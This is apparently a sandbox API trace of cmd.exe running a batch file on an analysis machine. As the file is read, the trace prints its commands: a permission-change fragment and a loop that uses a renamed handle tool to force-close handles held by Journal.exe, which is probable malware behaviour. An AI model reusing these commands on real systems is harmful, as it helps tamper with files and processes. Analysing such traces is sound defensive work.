0x2 [0219.516] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.516] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f56c | out: lpMode=0x28f56c) returned 1 [0219.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.516] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x550dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x28f598, lpReserved=0x0 | out: lpBuffer=0x550dc0*, lpNumberOfCharsWritten=0x28f598*=0x3) returned 1 [0219.517] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f5a4 | out: _Buffer=" FN=\"Journal.exe\" ") returned 18 [0219.517] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.517] GetFileType (hFile=0x7) returned 0x2 [0219.517] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.517] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f564 | out: lpMode=0x28f564) returned 1 [0219.517] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.517] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x12, lpNumberOfCharsWritten=0x28f590, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f590*=0x12) returned 1 [0219.518] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f5c4 | out: _Buffer="\r\n") returned 2 [0219.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.518] GetFileType (hFile=0x7) returned 0x2 [0219.518] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.518] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f584 | out: lpMode=0x28f584) returned 1 [0219.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.518] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f5b0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f5b0*=0x2) returned 1 [0219.520] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0219.520] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0219.520] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0219.520] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0219.520] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0219.520] _wcsicmp (_String1="set", _String2="CD") returned 16 [0219.520] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0219.520] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0219.520] _wcsicmp (_String1="set", _String2="REN") returned 1 [0219.520] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0219.520] _wcsicmp (_String1="set", _String2="SET") returned 0 [0219.520] GetConsoleTitleW (in: lpConsoleTitle=0x28f134, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.521] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0219.521] SetEnvironmentVariableW (lpName="FN", lpValue="\"Journal.exe\"") returned 1 [0219.521] GetProcessHeap () returned 0x550000 [0219.521] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568170 | out: hHeap=0x550000) returned 1 [0219.521] GetEnvironmentStringsW () returned 0x566b10* [0219.522] GetProcessHeap () returned 0x550000 [0219.522] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb7e) returned 0x567698 [0219.522] FreeEnvironmentStringsW (penv=0x566b10) returned 1 [0219.522] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.522] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.522] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.522] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0219.522] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.522] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0219.523] SetConsoleInputExeNameW () returned 0x1 [0219.523] GetConsoleOutputCP () returned 0x1b5 [0219.523] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0219.523] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.523] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f56c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0219.524] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0219.524] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.524] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0219.524] GetProcessHeap () returned 0x550000 [0219.524] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564200 | out: hHeap=0x550000) returned 1 [0219.524] GetProcessHeap () returned 0x550000 [0219.524] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5641c8 | out: hHeap=0x550000) returned 1 [0219.524] GetProcessHeap () returned 0x550000 [0219.524] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x551290 | out: hHeap=0x550000) returned 1 [0219.524] GetProcessHeap () returned 0x550000 [0219.524] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x550db8 | out: hHeap=0x550000) returned 1 [0219.524] GetProcessHeap () returned 0x550000 [0219.524] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564168 | out: hHeap=0x550000) returned 1 [0219.524] GetProcessHeap () returned 0x550000 [0219.524] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565840 | out: hHeap=0x550000) returned 1 [0219.524] GetProcessHeap () returned 0x550000 [0219.524] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x551220 | out: hHeap=0x550000) returned 1 [0219.525] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.525] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0219.525] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f550, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x28f550*=0xa3, lpOverlapped=0x0) returned 1 [0219.525] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0219.525] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0219.525] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.525] GetFileType (hFile=0x78) returned 0x1 [0219.525] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.525] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0219.525] GetProcessHeap () returned 0x550000 [0219.525] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x574b00 [0219.526] GetProcessHeap () returned 0x550000 [0219.526] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x70) returned 0x551220 [0219.526] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x28ece0, lpFilePart=0x28ecd8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x28ecd8*="Ch81ANBE.bat") returned 0x32 [0219.526] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28e9f4 | out: lpFindFileData=0x28e9f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x564168 [0219.526] FindClose (in: hFindFile=0x564168 | out: hFindFile=0x564168) returned 1 [0219.526] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x28e9f4 | out: lpFindFileData=0x28e9f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x564168 [0219.526] FindClose (in: hFindFile=0x564168 | out: hFindFile=0x564168) returned 1 [0219.526] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0219.526] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x28e9f4 | out: lpFindFileData=0x28e9f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x564168 [0219.526] FindClose (in: hFindFile=0x564168 | out: hFindFile=0x564168) returned 1 [0219.526] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x28e9f4 | out: lpFindFileData=0x28e9f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x564168 [0219.527] FindClose (in: hFindFile=0x564168 | out: hFindFile=0x564168) returned 1 [0219.527] GetProcessHeap () returned 0x550000 [0219.527] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x56) returned 0x564168 [0219.527] GetProcessHeap () returned 0x550000 [0219.527] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x574b00 | out: hHeap=0x550000) returned 1 [0219.529] _tell (_FileHandle=3) returned 78 [0219.529] _close (_FileHandle=3) returned 0 [0219.529] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f324 | out: _Buffer="\r\n") returned 2 [0219.529] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.529] GetFileType (hFile=0x7) returned 0x2 [0219.529] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.529] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f2e4 | out: lpMode=0x28f2e4) returned 1 [0219.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.530] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f310, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f310*=0x2) returned 1 [0219.531] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0219.531] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0219.531] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f320 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0219.531] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x28f320 | out: _Buffer=">") returned 1 [0219.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.531] GetFileType (hFile=0x7) returned 0x2 [0219.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.532] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f2e8 | out: lpMode=0x28f2e8) returned 1 [0219.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.532] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x28f314, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x28f314*=0x26) returned 1 [0219.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.532] GetFileType (hFile=0x7) returned 0x2 [0219.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.533] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f56c | out: lpMode=0x28f56c) returned 1 [0219.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.533] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x550dc0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f598, lpReserved=0x0 | out: lpBuffer=0x550dc0*, lpNumberOfCharsWritten=0x28f598*=0x2) returned 1 [0219.533] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f5a4 | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0219.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.533] GetFileType (hFile=0x7) returned 0x2 [0219.534] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.534] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f564 | out: lpMode=0x28f564) returned 1 [0219.534] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.534] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x28f590, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f590*=0x2d) returned 1 [0219.535] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f5c4 | out: _Buffer="\r\n") returned 2 [0219.536] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.536] GetFileType (hFile=0x7) returned 0x2 [0219.536] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.536] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f584 | out: lpMode=0x28f584) returned 1 [0219.536] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.536] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f5b0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f5b0*=0x2) returned 1 [0219.538] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0219.539] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0219.539] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0219.539] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0219.539] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0219.539] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0219.539] GetConsoleTitleW (in: lpConsoleTitle=0x28f134, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.540] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28eef0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28eee8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28eee8*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0219.540] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x28ec8c, lpFilePart=0x28ec88 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x28ec88*=0x0) returned 0x26 [0219.540] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0219.541] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28ea08 | out: lpFindFileData=0x28ea08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5644a8 [0219.541] FindClose (in: hFindFile=0x5644a8 | out: hFindFile=0x5644a8) returned 1 [0219.541] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x28ea08 | out: lpFindFileData=0x28ea08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5644a8 [0219.541] FindClose (in: hFindFile=0x5644a8 | out: hFindFile=0x5644a8) returned 1 [0219.541] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0219.541] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x28ea08 | out: lpFindFileData=0x28ea08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5644a8 [0219.541] FindClose (in: hFindFile=0x5644a8 | out: hFindFile=0x5644a8) returned 1 [0219.541] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0219.541] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0219.541] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0219.541] GetProcessHeap () returned 0x550000 [0219.541] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x567698 | out: hHeap=0x550000) returned 1 [0219.541] GetEnvironmentStringsW () returned 0x566b10* [0219.541] GetProcessHeap () returned 0x550000 [0219.542] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb7e) returned 0x567698 [0219.542] FreeEnvironmentStringsW (penv=0x566b10) returned 1 [0219.542] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0219.542] GetProcessHeap () returned 0x550000 [0219.542] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564448 | out: hHeap=0x550000) returned 1 [0219.542] GetProcessHeap () returned 0x550000 [0219.542] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5643e8 | out: hHeap=0x550000) returned 1 [0219.542] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.542] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.542] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.542] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0219.542] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.543] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0219.543] SetConsoleInputExeNameW () returned 0x1 [0219.543] GetConsoleOutputCP () returned 0x1b5 [0219.543] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0219.543] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.543] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f56c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0219.544] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0219.544] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.544] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0219.544] GetProcessHeap () returned 0x550000 [0219.544] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564378 | out: hHeap=0x550000) returned 1 [0219.544] GetProcessHeap () returned 0x550000 [0219.544] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564308 | out: hHeap=0x550000) returned 1 [0219.544] GetProcessHeap () returned 0x550000 [0219.544] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564298 | out: hHeap=0x550000) returned 1 [0219.544] GetProcessHeap () returned 0x550000 [0219.544] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564228 | out: hHeap=0x550000) returned 1 [0219.544] GetProcessHeap () returned 0x550000 [0219.544] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x550db8 | out: hHeap=0x550000) returned 1 [0219.544] GetProcessHeap () returned 0x550000 [0219.544] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5641c8 | out: hHeap=0x550000) returned 1 [0219.544] GetProcessHeap () returned 0x550000 [0219.545] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564168 | out: hHeap=0x550000) returned 1 [0219.545] GetProcessHeap () returned 0x550000 [0219.545] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x551220 | out: hHeap=0x550000) returned 1 [0219.545] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.545] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0219.545] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f550, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x28f550*=0x94, lpOverlapped=0x0) returned 1 [0219.545] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0219.545] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.545] GetFileType (hFile=0x78) returned 0x1 [0219.545] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.545] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0219.545] GetProcessHeap () returned 0x550000 [0219.545] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x574b00 [0219.546] GetProcessHeap () returned 0x550000 [0219.546] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4008) returned 0x578b18 [0219.547] GetProcessHeap () returned 0x550000 [0219.547] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xe) returned 0x550db8 [0219.547] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"Journal.exe\"") returned 0xd [0219.547] GetProcessHeap () returned 0x550000 [0219.547] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x550db8 | out: hHeap=0x550000) returned 1 [0219.547] GetProcessHeap () returned 0x550000 [0219.547] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x578b18 | out: hHeap=0x550000) returned 1 [0219.547] GetProcessHeap () returned 0x550000 [0219.547] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x574b00 | out: hHeap=0x550000) returned 1 [0219.554] _tell (_FileHandle=3) returned 226 [0219.555] _close (_FileHandle=3) returned 0 [0219.555] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f324 | out: _Buffer="\r\n") returned 2 [0219.555] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.555] GetFileType (hFile=0x7) returned 0x2 [0219.555] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.555] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f2e4 | out: lpMode=0x28f2e4) returned 1 [0219.555] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.555] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f310, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f310*=0x2) returned 1 [0219.557] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0219.557] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0219.557] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f320 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0219.558] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x28f320 | out: _Buffer=">") returned 1 [0219.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.558] GetFileType (hFile=0x7) returned 0x2 [0219.558] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.558] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f2e8 | out: lpMode=0x28f2e8) returned 1 [0219.559] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.559] WriteConsoleW (in: hConsoleOutput=0x7, 